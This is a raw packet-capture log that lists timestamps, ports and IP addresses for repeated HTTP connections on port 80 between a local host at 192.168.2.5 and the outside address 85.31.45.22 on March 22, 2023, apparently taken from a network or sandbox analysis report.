Mar 22, 2023 11:21:24.179095984 CET	80	49705	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.179248095 CET	49705	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.179936886 CET	49705	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.199414015 CET	49706	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.206379890 CET	80	49705	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.226115942 CET	80	49706	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.226408005 CET	49706	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.231715918 CET	49706	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.231774092 CET	49706	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.258368015 CET	80	49706	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.258403063 CET	80	49706	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.381699085 CET	80	49706	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.381784916 CET	80	49706	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.381944895 CET	49706	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.381944895 CET	49706	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.384232998 CET	49706	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.392050028 CET	49707	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.410809040 CET	80	49706	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.418919086 CET	80	49707	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.419383049 CET	49707	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.420434952 CET	49707	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.420434952 CET	49707	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.446970940 CET	80	49707	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.600121021 CET	80	49707	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.600166082 CET	80	49707	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.600287914 CET	49707	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.600287914 CET	49707	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.600631952 CET	49707	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.604010105 CET	49708	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.627274036 CET	80	49707	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.630433083 CET	80	49708	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.630580902 CET	49708	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.632407904 CET	49708	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.632481098 CET	49708	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.658958912 CET	80	49708	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.659013987 CET	80	49708	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.659053087 CET	80	49708	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.788604975 CET	80	49708	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.788676977 CET	80	49708	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.788707018 CET	49708	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.788763046 CET	49708	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.789813995 CET	49708	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.816063881 CET	49709	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.816504002 CET	80	49708	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.842859983 CET	80	49709	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.842998028 CET	49709	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.843434095 CET	49709	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.843523979 CET	49709	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.870043039 CET	80	49709	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.993150949 CET	80	49709	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.993263960 CET	49709	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.010865927 CET	49709	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.025063992 CET	49710	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.037544966 CET	80	49709	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.051850080 CET	80	49710	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.052026033 CET	49710	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.052685976 CET	49710	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.052767992 CET	49710	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.080441952 CET	80	49710	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.207897902 CET	80	49710	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.208229065 CET	49710	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.221209049 CET	49710	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.238972902 CET	49711	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.247829914 CET	80	49710	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.265796900 CET	80	49711	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.265927076 CET	49711	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.266721964 CET	49711	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.266778946 CET	49711	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.293354988 CET	80	49711	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.293371916 CET	80	49711	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.448540926 CET	80	49711	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.448575974 CET	80	49711	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.448800087 CET	49711	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.448852062 CET	49711	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.458923101 CET	49712	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.475481033 CET	80	49711	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.485655069 CET	80	49712	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.485814095 CET	49712	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.486253977 CET	49712	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.486335993 CET	49712	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.512814999 CET	80	49712	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.512857914 CET	80	49712	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.512883902 CET	80	49712	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.640055895 CET	80	49712	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.640136003 CET	80	49712	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.640316963 CET	49712	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.640316963 CET	49712	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.643902063 CET	49712	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.657644033 CET	49713	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.670768023 CET	80	49712	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.685772896 CET	80	49713	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.685889006 CET	49713	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.687057972 CET	49713	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.687057972 CET	49713	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.713722944 CET	80	49713	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.713771105 CET	80	49713	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.836719990 CET	80	49713	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.836894989 CET	49713	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.837068081 CET	49713	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.853749990 CET	49714	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.863653898 CET	80	49713	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.880557060 CET	80	49714	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:25.880831003 CET	49714	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.895426035 CET	49714	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.895426989 CET	49714	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:25.922046900 CET	80	49714	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.039949894 CET	80	49714	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.040222883 CET	49714	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.040338039 CET	49714	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.055327892 CET	49715	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.066900015 CET	80	49714	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.082006931 CET	80	49715	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.082175016 CET	49715	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.096620083 CET	49715	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.096662998 CET	49715	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.123281002 CET	80	49715	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.164314985 CET	80	49715	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.243899107 CET	80	49715	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.244048119 CET	49715	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.244302034 CET	49715	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.251323938 CET	49716	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.271801949 CET	80	49715	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.278121948 CET	80	49716	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.278676033 CET	49716	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.278676033 CET	49716	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.278755903 CET	49716	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.305285931 CET	80	49716	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.348278046 CET	80	49716	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.419627905 CET	80	49716	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.419825077 CET	49716	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.419943094 CET	49716	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.442707062 CET	49717	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.446597099 CET	80	49716	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.469397068 CET	80	49717	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.469736099 CET	49717	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.470169067 CET	49717	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.470240116 CET	49717	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.496613026 CET	80	49717	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.496650934 CET	80	49717	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.496675968 CET	80	49717	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.654256105 CET	80	49717	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.654449940 CET	49717	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.654547930 CET	49717	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.659090042 CET	49718	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.680979967 CET	80	49717	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.685656071 CET	80	49718	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.686113119 CET	49718	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.687133074 CET	49718	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.687217951 CET	49718	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.713740110 CET	80	49718	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.713797092 CET	80	49718	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.859613895 CET	80	49718	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.859734058 CET	49718	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.859860897 CET	49718	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.877835035 CET	49719	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.886459112 CET	80	49718	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.904479980 CET	80	49719	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.904897928 CET	49719	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.905324936 CET	49719	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.905324936 CET	49719	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:26.931917906 CET	80	49719	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:26.972357035 CET	80	49719	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.051784039 CET	80	49719	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.052514076 CET	49719	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.052514076 CET	49719	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.061024904 CET	49720	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.079246998 CET	80	49719	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.087703943 CET	80	49720	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.087938070 CET	49720	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.096477032 CET	49720	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.096529961 CET	49720	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.126861095 CET	80	49720	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.126890898 CET	80	49720	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.243411064 CET	80	49720	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.243596077 CET	49720	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.243702888 CET	49720	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.257097006 CET	49721	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.270324945 CET	80	49720	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.283950090 CET	80	49721	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.284176111 CET	49721	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.284539938 CET	49721	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.284693003 CET	49721	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.311275959 CET	80	49721	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.311569929 CET	80	49721	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.471998930 CET	80	49721	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.472243071 CET	49721	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.472332954 CET	49721	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.481204033 CET	49722	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.498728991 CET	80	49721	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.507895947 CET	80	49722	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.508127928 CET	49722	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.510185003 CET	49722	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.510253906 CET	49722	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.536762953 CET	80	49722	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.536803007 CET	80	49722	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.657152891 CET	80	49722	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.657269001 CET	49722	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.657352924 CET	49722	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.666007042 CET	49723	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.683839083 CET	80	49722	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.692677021 CET	80	49723	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.692795038 CET	49723	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.693178892 CET	49723	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.693224907 CET	49723	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.719645023 CET	80	49723	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.832185030 CET	80	49723	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.832362890 CET	49723	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.838310003 CET	49723	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.845650911 CET	49724	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.864876032 CET	80	49723	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.872488976 CET	80	49724	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.872618914 CET	49724	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.873126984 CET	49724	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.873178005 CET	49724	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:27.899879932 CET	80	49724	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:27.940233946 CET	80	49724	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.016093969 CET	80	49724	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.016309023 CET	49724	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.016407013 CET	49724	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.029321909 CET	49725	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.043028116 CET	80	49724	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.056061029 CET	80	49725	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.056242943 CET	49725	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.058835030 CET	49725	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.058890104 CET	49725	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.085421085 CET	80	49725	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.234536886 CET	80	49725	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.234678984 CET	49725	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.237843990 CET	49725	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.264472961 CET	80	49725	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.305366993 CET	49726	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.332159996 CET	80	49726	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.332309008 CET	49726	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.332755089 CET	49726	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.332834005 CET	49726	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.359330893 CET	80	49726	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.359410048 CET	80	49726	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.359467983 CET	80	49726	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.472125053 CET	80	49726	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.472306013 CET	49726	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.472404957 CET	49726	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.491604090 CET	49727	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.498894930 CET	80	49726	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.518310070 CET	80	49727	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.518635035 CET	49727	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.525671959 CET	49727	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.525724888 CET	49727	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.552586079 CET	80	49727	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.552611113 CET	80	49727	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.671166897 CET	80	49727	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.671334982 CET	49727	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.671468973 CET	49727	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.693224907 CET	49728	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.697868109 CET	80	49727	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.720108032 CET	80	49728	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.720329046 CET	49728	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.727281094 CET	49728	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.727344990 CET	49728	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.753973007 CET	80	49728	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.875953913 CET	80	49728	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.876172066 CET	49728	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.876277924 CET	49728	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.893644094 CET	49729	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.903002024 CET	80	49728	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.920336962 CET	80	49729	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:28.920542955 CET	49729	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.921601057 CET	49729	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.921655893 CET	49729	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:28.949161053 CET	80	49729	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.065377951 CET	80	49729	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.065457106 CET	49729	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.065974951 CET	49729	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.092546940 CET	80	49729	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.415062904 CET	49730	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.442328930 CET	80	49730	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.442498922 CET	49730	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.478586912 CET	49730	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.478645086 CET	49730	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.505844116 CET	80	49730	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.506263971 CET	80	49730	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.622883081 CET	80	49730	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.623106956 CET	49730	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.686733007 CET	49730	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.709645987 CET	49731	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.713301897 CET	80	49730	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.736192942 CET	80	49731	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.736386061 CET	49731	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.785685062 CET	49731	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.785753012 CET	49731	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.812540054 CET	80	49731	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.935949087 CET	80	49731	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:29.936104059 CET	49731	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:29.992233992 CET	49731	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:30.014411926 CET	49732	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:30.021292925 CET	80	49731	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:30.041059017 CET	80	49732	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:30.041232109 CET	49732	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:30.051476955 CET	49732	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:30.051542044 CET	49732	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:30.078139067 CET	80	49732	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:30.120198965 CET	80	49732	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:30.203032017 CET	80	49732	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:30.203229904 CET	49732	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:31.149981022 CET	49732	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:31.178251028 CET	80	49732	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:31.348249912 CET	49733	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:31.375205994 CET	80	49733	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:31.375418901 CET	49733	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:31.458725929 CET	49733	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:31.458791018 CET	49733	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:31.485837936 CET	80	49733	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:31.528244019 CET	80	49733	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:31.606739044 CET	80	49733	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:31.606925011 CET	49733	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.627969980 CET	49733	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.654548883 CET	80	49733	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.909241915 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.935772896 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.935924053 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.942826033 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.942974091 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.969470978 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969531059 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969574928 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969619036 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.969621897 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969666004 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969667912 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.969692945 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.969717026 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.969734907 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969769001 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969789028 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.969803095 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969825983 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.969837904 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.969861984 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.969892979 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996501923 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996556997 CET	80	49734	85.31.45.22	192.168.2.5
